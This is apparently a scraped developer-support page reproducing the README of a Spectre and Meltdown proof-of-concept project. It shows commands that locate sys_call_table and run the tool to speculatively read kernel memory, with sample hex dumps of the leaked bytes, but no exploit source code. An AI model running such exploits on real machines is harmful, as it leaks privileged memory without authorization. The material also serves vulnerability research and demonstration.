Need help with spectre-meltdown-poc?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

mniip
127 Stars 53 Forks 14 Commits 5 Opened issues

Description

A semi-demi-working proof of concept for a mix of spectre and meltdown vulnerabilities

Services available

!
?

Need anything else?

Contributors list

# 106,445
Perl
TeX
proof-o...
cellula...
14 commits

Spectre and Meltdown Proof-of-Concept

Read kernel addresses by stalling the pipeline and speculatively hitting a cacheline:

$ make
...
$ grep ' sys_call_table' /proc/kallsyms
ffffffff8f800180 R sys_call_table
$ ./poc ffffffff8f800180
0xffffffff8f800180 | 10 40 23 8f ff ff ff ff d0 40 23 8f ff ff ff ff
0xffffffff8f800190 | c0 14 23 8f ff ff ff ff 60 f6 22 8f ff ff ff ff
0xffffffff8f8001a0 | 40 91 23 8f ff ff ff ff 70 91 23 8f ff ff ff ff
0xffffffff8f8001b0 | 50 91 23 8f ff ff ff ff 10 af 24 8f ff ff ff ff
...

Motivational GIF

Read kernel addresses by poisoning the branch predictor and speculatively hitting a cacheline:

$ ./poc_poison ffffffff8f800180
cutoff: 192
0xffffffff8f800180 | 10 40 23 8f ff ff ff ff d0 40 23 8f ff ff ff ff
...

Visualize memory read timings:

$ ./poc_vis ffffffff8f800180

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.